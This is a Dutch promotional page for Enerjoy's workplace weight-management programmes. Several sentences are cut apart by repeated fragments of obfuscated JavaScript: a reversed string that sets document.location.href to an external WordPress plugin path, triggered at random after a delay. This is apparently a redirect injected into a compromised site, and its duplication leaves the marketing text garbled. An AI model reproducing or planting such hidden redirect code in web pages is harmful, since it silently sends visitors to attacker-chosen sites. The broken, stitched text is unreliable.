Afvallen op het werk

Afvallen op het werk - EnerjoyVolwassenen besteden meer dan de helft van hun wakkere uren op het werk. Dit geeft werkgevers de unieke gelegenheid om van invloed te zijn op de gezondheid en het welzijn van hun werknemers. Omdat meer dan de helft van alle werknemers kampt met overgewicht of obesitas, is het in ieders belang dat er aandacht besteed wordt aan gewichtsbeheersing op het werk door middel van dieetadvies.
Met hulp van de Enerjoy interventies1 motiveert u uw werknemers toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot het volgen van een gezond dieet. Resultaat? Medewerkers die afslanken hebben meer energie en focus en een krachtige productiviteit!

Waarom focussen op gewichtsbeheersing?

Wist u dat de gezondheid van werknemers een aanzienlijke invloed heeft op de kwantiteit & kwaliteit van de werkzaamheden? Daarom sporen steeds meer werkgevers hun personeel aan toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot het volgen van een gezond dieetadvies. Dit is de sleutel toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot preventie van chronische ziekten en aandoeningen. U kunt hierbij denken aan slaapapneu, problemen met het beweegapparaat zoals rug-, knie-, en heup- en klachten, diabetes, hart- en vaatziekten en kanker.

Afslanken op het werk

Het stimuleren van gewichtsbeheersing op de werkvloer kent veel voordelen. Door werknemers te ondersteunen bij het aanleren van een gezond dieet genereert u niet alleen een hogere productiviteit, maar ook de verzuimkosten zullen fors dalen. En dan hebben we het nog niet eens over de vernieuwde energie en plezierige werksfeer die daar uit voortkomt!

Duurzaam gezonde werknemers

Wie investeert in de gezondheid van zijn medewerkers plukt daar zelf op termijn de vruchten van. Door advies en activiteiten op het gebied van dieet, afslanken en gewichtsbeheersing aan uw werknemers aan te bieden, creƫert u een levenslustige en vruchtbare werkomgeving. Enerjoy helpt u hier graag bij. Met trainingen, workshops, preventieve en curatieve interventies begeleiden wij uw personeel naar een gezonde leefstijl en een gezond gewicht.
Tijd voor vitale en blije werknemers die uw bedrijf uiteindelijk meer winst opleveren? Win-win! Ontdek nu alle mogelijkheden van Enerjoy.


[ess_grid alias=”overgewicht”]